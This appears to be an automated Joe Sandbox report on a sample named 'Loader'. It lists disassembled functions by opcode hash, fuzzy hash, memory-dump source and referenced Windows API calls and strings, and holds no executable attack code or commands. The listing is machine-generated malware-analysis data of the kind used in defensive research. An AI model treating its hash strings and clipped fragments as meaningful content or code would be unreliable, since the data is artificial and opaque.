                                                                                          • Opcode ID: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                          • Instruction ID: e0d07545bf99c5bcf9f53104091ab12fee6b55ff989ca51c3b901817dc0cabf8
                                                                                          • Opcode Fuzzy Hash: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                          • Instruction Fuzzy Hash: 67F1BD356087418FD724CF29C881A6BFBE2EFD9304F08882DE5D597391E639E944CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 191114f41b7dd2d43134bfb0a00d8d37a42c40c5bb86188d97d5f3937e1773dc
                                                                                          • Instruction ID: f13c2bdf90e971f3eaf5a9336ce2231f8ed65c36f054cc718fd1371a7506e679
                                                                                          • Opcode Fuzzy Hash: 191114f41b7dd2d43134bfb0a00d8d37a42c40c5bb86188d97d5f3937e1773dc
                                                                                          • Instruction Fuzzy Hash: 2DC124B0D04225CFCB10CF64D8916AEBB71FF56314F19856EE8156B396EB38AC01CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f284a70105d7794661198204b2091bfebd80386a1c9b8a6cacc7f5ea85886d7
                                                                                          • Instruction ID: b9b509e6e49c4d131d7aa7f7af49c179d0f0f27c0afc080723a459acff23a10c
                                                                                          • Opcode Fuzzy Hash: 7f284a70105d7794661198204b2091bfebd80386a1c9b8a6cacc7f5ea85886d7
                                                                                          • Instruction Fuzzy Hash: 93913872A442618FC7158E28CC9139B7BE2ABC5324F19863EE8B9973C1D738DC4697C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 23f17e0cdea6eb7299afad9dfaa0018a689292dc5aab41bd9922b8370519d840
                                                                                          • Instruction ID: e76f976c773fbf04b9f7327d9d466f2d567fba6bd7a1799d7739ea24fa2954c5
                                                                                          • Opcode Fuzzy Hash: 23f17e0cdea6eb7299afad9dfaa0018a689292dc5aab41bd9922b8370519d840
                                                                                          • Instruction Fuzzy Hash: 3C516B35B147019FDB188E2DEC816BBB7D2EB99320F18553EE8D587392E7389C028795
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23071ed7aba6299ea5a8a1138616b71056be3a4b4f8ad3feef5fae73212ecf53
                                                                                          • Instruction ID: d0aa8978018156a2f9b2c138b81b42fdf2c2dd25e4ff143a5cefdfbf7dce8a99
                                                                                          • Opcode Fuzzy Hash: 23071ed7aba6299ea5a8a1138616b71056be3a4b4f8ad3feef5fae73212ecf53
                                                                                          • Instruction Fuzzy Hash: A9716E715083849BDB148A6C8D883A77B94EF56314F18C63FE8999B3C2E3BDC905D35A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67541b89d1e2a790723e351c6a2256827d0579c96e035509cabc2be9ab00f357
                                                                                          • Instruction ID: 79a1c04b856af922b25cae0e034fa734e047d26e083de99eeb14b1ed38a3ff48
                                                                                          • Opcode Fuzzy Hash: 67541b89d1e2a790723e351c6a2256827d0579c96e035509cabc2be9ab00f357
                                                                                          • Instruction Fuzzy Hash: F8512A72E18B254BD7188E6DAC5023AB2D2ABC4204F8D863DDD569B385EF74AC10D7C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8a6cc2b17862459f61344c35872a97195db7e73bbb7928c48526c959f2b322d
                                                                                          • Instruction ID: b38c95726408b968969ddf6a7085e2b621652b8ebaef776a4f79e8581fab324f
                                                                                          • Opcode Fuzzy Hash: b8a6cc2b17862459f61344c35872a97195db7e73bbb7928c48526c959f2b322d
                                                                                          • Instruction Fuzzy Hash: BF3156B161C7809BE720DF25A801B9FBBB1EBD2384F408D2DD4D86A211E6398505CB5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f7c56e9b388505c64ea653f2a815aa82959ae0d5801d18e48bd9a1b995f90e20
                                                                                          • Instruction ID: fb84bfcd7364cd1e02f9907049cc3bb89e5f2374717776f149e762b11120e404
                                                                                          • Opcode Fuzzy Hash: f7c56e9b388505c64ea653f2a815aa82959ae0d5801d18e48bd9a1b995f90e20
                                                                                          • Instruction Fuzzy Hash: 4321B5347186119FD71C8F2AA48193BB3B2EB86716FA0152DE59213262C73DED178BCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction ID: 5d70dd1efbd36929d760f2f261d8bda5826f1eaaa5b95a91e4b726fde98d8be2
                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction Fuzzy Hash: 0F112933A041D50EC3128D3C84005A9BFA30BD7634F1AD39AF8B49B2D2D7268D8A9359
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e309efab317e40e93bb7692b60289ba2d332d2c67ff9717def56087b73cb8e32
                                                                                          • Instruction ID: c8cccba91deed7ad6ce4873294a279e7cc7abd757a3d9d4cea866000f87810c8
                                                                                          • Opcode Fuzzy Hash: e309efab317e40e93bb7692b60289ba2d332d2c67ff9717def56087b73cb8e32
                                                                                          • Instruction Fuzzy Hash: 350192B1B0031147E6209E51A5C172BB2A96F80718F48443EDC0557342DB7DFC24C29B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0ad718d4c749f33f4747fd3987d0219820583e9f450f49e4526138e3d3856be
                                                                                          • Instruction ID: 1e6f5f065346c868a4374216e1ff8e8563d53b6b319917fc3693fb1f15cd7457
                                                                                          • Opcode Fuzzy Hash: f0ad718d4c749f33f4747fd3987d0219820583e9f450f49e4526138e3d3856be
                                                                                          • Instruction Fuzzy Hash: 9FF0E5A9B5A7418BE708DF398C5147B77F2D3DB210F19E93CC582C3354C53894428649
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec1440257568dcacbce9808453dc8733135d1e2a19017a23d007bafd7ccfd25d
                                                                                          • Instruction ID: a78cf1e6e0e68aebd5d0843b64b69d33ecbc022396edd014815549610411c9de
                                                                                          • Opcode Fuzzy Hash: ec1440257568dcacbce9808453dc8733135d1e2a19017a23d007bafd7ccfd25d
                                                                                          • Instruction Fuzzy Hash: 0ED05BA6C9111027D32897219D5997B75384597604B0A6A1DDC4523745E23D9C1445E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a00d8186f097e825981dba5d6c4823ac2805a43ff07e82d2d035b6ae9fa46635
                                                                                          • Instruction ID: 5e988d5e729d8ceb5db615c77d7debf3ee2c932a3ab167ff4f79766e21bd48a6
                                                                                          • Opcode Fuzzy Hash: a00d8186f097e825981dba5d6c4823ac2805a43ff07e82d2d035b6ae9fa46635
                                                                                          • Instruction Fuzzy Hash: 05B0127CB4A48087C30CDF08EC51630B3F9E327394B053039940BE32A1D510D815890E
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: A$L$L$O$U$V$g$o$t$x$|
                                                                                          • API String ID: 2610073882-1753474633
                                                                                          • Opcode ID: 39c64bd33bd6552f2e51df1a87fd19bec2da68075fa32bf6ea1a30ab81113642
                                                                                          • Instruction ID: e93254ed8265b389484747ba7ae3652620e53d65a7222c82b7b357315d594193
                                                                                          • Opcode Fuzzy Hash: 39c64bd33bd6552f2e51df1a87fd19bec2da68075fa32bf6ea1a30ab81113642
                                                                                          • Instruction Fuzzy Hash: A741F22460C7C18ED331DB38985879BBFD16B97224F088B9DD4ED4A2D2C7784149CB23
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: &$0$1$=$@$A$F$I
                                                                                          • API String ID: 2525500382-2691759510
                                                                                          • Opcode ID: 6616321cee811b5abb673aa44505d5660c3c4f9db507fb7c077eb8c7dafc1005
                                                                                          • Instruction ID: 6dbe45b2a04d6db8cde2141575943bfb59b89fcd93c4d3154aa8bf0d1f5f7dca
                                                                                          • Opcode Fuzzy Hash: 6616321cee811b5abb673aa44505d5660c3c4f9db507fb7c077eb8c7dafc1005
                                                                                          • Instruction Fuzzy Hash: 1081E36150CBC28AC3268A7C588864FEFD21BE7234F584BADF1F54B3E6D2648502C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: &$0$1$=$@$A$F$I
                                                                                          • API String ID: 2525500382-2691759510
                                                                                          • Opcode ID: 059fca28d7772aa94a1e26ba6d39b749d7ebe0ed0f2a4461eba500a0b5dba51d
                                                                                          • Instruction ID: 8cc4701dd146bd2eb1350ce2bf29858de9d71db05192a895d6f482bf7fa7267d
                                                                                          • Opcode Fuzzy Hash: 059fca28d7772aa94a1e26ba6d39b749d7ebe0ed0f2a4461eba500a0b5dba51d
                                                                                          • Instruction Fuzzy Hash: 5481E46150CBD28AC3268A7C588864FFFD11AE7234F484BADF6F18B3E6D2548506C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCloseFileHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2836222988-1429953656
                                                                                          • Opcode ID: bcaace1852efb5552b20a57389d809474cd5f3f9f35b96ca0830673504547e1f
                                                                                          • Instruction ID: 533097114c8b68555f689c5a1a8f3d0cb896ec2f5760232fc5e9618ce9abc82c
                                                                                          • Opcode Fuzzy Hash: bcaace1852efb5552b20a57389d809474cd5f3f9f35b96ca0830673504547e1f
                                                                                          • Instruction Fuzzy Hash: D14107B4D08219DFCB01EFA8D5487AEBBF0BF49310F008429E899AB350D774A545CF92
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0034417D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00344238
                                                                                          • __alloca_probe_16.LIBCMT ref: 003442F3
                                                                                          • __alloca_probe_16.LIBCMT ref: 00344382
                                                                                          • __freea.LIBCMT ref: 003443CD
                                                                                          • __freea.LIBCMT ref: 003443D3
                                                                                          • __freea.LIBCMT ref: 00344409
                                                                                          • __freea.LIBCMT ref: 0034440F
                                                                                          • __freea.LIBCMT ref: 0034441F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 843ac4146b43c1fa775d9d25e1b9eb78b8d09c96f97a63be4ce21bce6a9f9e8c
                                                                                          • Instruction ID: bbe83e61c24784104688c445400c4bf9fb257c9af3f71115031e16d73b20a00e
                                                                                          • Opcode Fuzzy Hash: 843ac4146b43c1fa775d9d25e1b9eb78b8d09c96f97a63be4ce21bce6a9f9e8c
                                                                                          • Instruction Fuzzy Hash: A3710472900259ABDF239E959C82BAE77F9AF49710F2A0539F904BF281D775BC108750
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 6d79685e0c2747eaea848289b804a42b9ab23d8f486748fcfb1b4f2673e8b016
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: 2CB12672A003559FDB138F24CCC2BAEBBA5EF55350F294165FA05AF282DB74D941C7A0
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00334E2B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 003350A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm$xf4
                                                                                          • API String ID: 2673424686-2576437276
                                                                                          • Opcode ID: 3d12451c104b19b514fa68dba9808521b99e6a89b992400e161383438ef1a432
                                                                                          • Instruction ID: ecbfcbb52abac7ba72d48bf79c56ca2601a79c4a369c954a59224a9cbde117ae
                                                                                          • Opcode Fuzzy Hash: 3d12451c104b19b514fa68dba9808521b99e6a89b992400e161383438ef1a432
                                                                                          • Instruction Fuzzy Hash: 70B18831800219EFCF1ADFA5D8C19AEBBB5BF14300F16456AE9156F212C331EA51CB91
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032ABA7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0032ABAF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032AC38
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0032AC63
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0032ACB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: e24b4aa2e2e4209cfaf7e3b3196245ba70361da3fed1de9d5ec385b482f32a7f
                                                                                          • Instruction ID: 02322ada8c7d2987d8e7e2810c14ea0c0eeb8b78d7a9ada5d1137cf792450df7
                                                                                          • Opcode Fuzzy Hash: e24b4aa2e2e4209cfaf7e3b3196245ba70361da3fed1de9d5ec385b482f32a7f
                                                                                          • Instruction Fuzzy Hash: E341D134A00A389BCF16DF68E881A9EBBB5BF05324F158155E8159F352CB35EA05CFD2
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00336711,00000000,00000000,00000000,00000000), ref: 003366C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 430e5cd0b8a33b51684df382fe25dd9dc5cf1c382a94b3ea0e4146084f0a7e5a
                                                                                          • Instruction ID: 1d84201713488179e8682a226fb5ea9b2a8a10ea12645d5fd4000f3359c4771e
                                                                                          • Opcode Fuzzy Hash: 430e5cd0b8a33b51684df382fe25dd9dc5cf1c382a94b3ea0e4146084f0a7e5a
                                                                                          • Instruction Fuzzy Hash: 5F21D835A01215BFC7339B61DCC7A5A376CAB417A1F164114ED05AB290DB70FD00CAD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 10e133c26a22c5f5fa07172f58e91b5a74c89ce0f700a95adefd80bba2544d1b
                                                                                          • Instruction ID: 540a5341f5203e5e223cfc8acceab2854a902cb909159860d5598a557f7da970
                                                                                          • Opcode Fuzzy Hash: 10e133c26a22c5f5fa07172f58e91b5a74c89ce0f700a95adefd80bba2544d1b
                                                                                          • Instruction Fuzzy Hash: AAB1A270A04249AFDB13DFA9C881BAEBBF5BF4A310F554258E4059F292D771AE41CB60
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00334424,0032A93D,00329B94), ref: 0033443B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00334449
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00334462
                                                                                          • SetLastError.KERNEL32(00000000,00334424,0032A93D,00329B94), ref: 003344B4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 5ec5f6dd04dfbda11966307a201332a54bc5484e944785ecb759e2612f6156f1
                                                                                          • Instruction ID: 5f37e4225c9c40677a6d429e3e28a0ec4a97d1aa88f92eba13736c459f04d0d7
                                                                                          • Opcode Fuzzy Hash: 5ec5f6dd04dfbda11966307a201332a54bc5484e944785ecb759e2612f6156f1
                                                                                          • Instruction Fuzzy Hash: 3B01F73250A7116EF72B2B76BCC5A6B2A8CEB5277AF200339F510691F1FF526C015280
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00345644,000000FF,?,0032F279,0032F160,?,0032F315,00000000), ref: 0032F1ED
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0032F1FF
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00345644,000000FF,?,0032F279,0032F160,?,0032F315,00000000), ref: 0032F221
                                                                                          Strings
